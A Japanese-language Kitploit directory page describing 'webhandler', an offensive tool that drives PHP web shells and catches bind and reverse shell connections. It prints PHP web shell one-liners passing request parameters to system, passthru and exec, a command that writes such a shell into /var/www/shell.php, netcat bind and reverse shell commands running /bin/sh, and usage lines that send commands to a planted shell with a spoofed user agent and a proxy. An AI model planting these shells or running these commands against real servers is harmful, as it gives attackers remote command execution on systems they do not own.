Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
webhandler — PHPのシステム関数を使用してサーバーを制御するBashシミュレーター | Kitploit
ツール/GitHubGitHub/lnxg33k/webhandler
ペイロード生成IDS/IPS回避ウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHublnxg33k/webhandler

webhandler

PHPのシステム関数を使用してサーバーを制御するBashシミュレーター

リポジトリを見る
100245年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WebHandler


PHPシステム関数用のハンドラーであり、'netcat' ハンドラーの代替でもあります 私の画像

情報


WebHandlerは、'Linux bash プロンプト'をシミュレートして、以下を処理および実行しようとします:

root@kitploit:~
- PHPプログラム実行関数 _(例: `system`、`passthru`、`exec` など)_
- バインドシェル接続
- リバースシェル接続

もう1つの機能は、HTTPヘッダーの"User-Agent"フィールドを偽装することです。(--random-angent)。

また、HTTPプロキシもサポートします (--proxy http://<ip>:<port>)

  • WebHandlerはPOSTおよびGETリクエストで動作します:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandlerはnetcat接続の代替品です。

    バインド接続の例 (例: nc -lvvp 1234 -e /bin/sh)

    通常、ユーザーは次のようにします:

    • netcat -l -p 1234
    • nc -lvvp 1234

    リバース接続の例 (例: nc 127.0.0.1 4321 -e /bin/sh)

    通常、ユーザーは次のようにします:

    • netcat -l -p 4321
    • nc -lvvp 4321

使用方法


  • --Example ファイル:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url は、GETまたはPOSTリクエストを送信する際の必須引数です (例: 'WebベースのPHP' バインド接続):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen は、待機接続を扱う際の必須引数です (例: 'raw' リバース接続):

    • python webhandler.py --listen 1234

依存関係


Pythonのバージョンが2.7.x未満の場合は、argparseが必要です インストールするには、sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse または sudo pip --install argparse を実行してください。

readlineはオプションです。 このモジュールは、高度な行編集機能と履歴機能を提供するために使用されます。

gitはオプションです。 これにより、プロジェクトを最新の状態に保つことができます。

リンク


ウィキ

既知のバグ

ツールをダウンロード